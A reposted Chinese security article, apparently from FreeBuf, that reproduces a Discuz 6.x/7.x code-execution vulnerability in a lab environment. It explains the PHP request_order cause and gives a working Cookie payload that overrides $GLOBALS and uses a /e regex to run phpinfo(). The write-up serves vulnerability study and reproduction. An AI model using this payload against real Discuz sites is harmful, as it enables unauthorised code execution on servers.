Discuz 7.x 6.x 全局变量防御绕过代码执行(wooyun-2010-080723)漏洞复现
2021-03-22 20:15:44 Author: www.freebuf.com(查看原文) 阅读量:100 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

  Discuz!是康盛创想(北京)科技有限公司推出的一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的论坛服务。

该漏洞产生原因是因为php的5.3.x版本里php.ini的设置里`request_order`默认值为GP,导致`$_REQUEST`中不再包含`$_COOKIE`。通过在Cookie中传入`$GLOBALS`可以覆盖全局变量,造成代码执行漏洞。

本文仅作漏洞复现记录与实现,利用流程如下:

1.漏洞环境

漏洞链接: http://192.168.101.152:8080/

访问后如下所示

1616411252_60587a74f06a69fea8ceb.png!small

2.利用流程

找到一个已存在的帖子

1616411356_60587adca894a9fe0a598.png!small

1616411365_60587ae5e56fc7bf95c2d.png!small

使用burp抓包,修改cookie值

Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui;  GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

1616411394_60587b02829134939051c.png!small

即可执行php代码


文章来源: https://www.freebuf.com/vuls/267109.html
如有侵权请联系:admin#unsafe.sh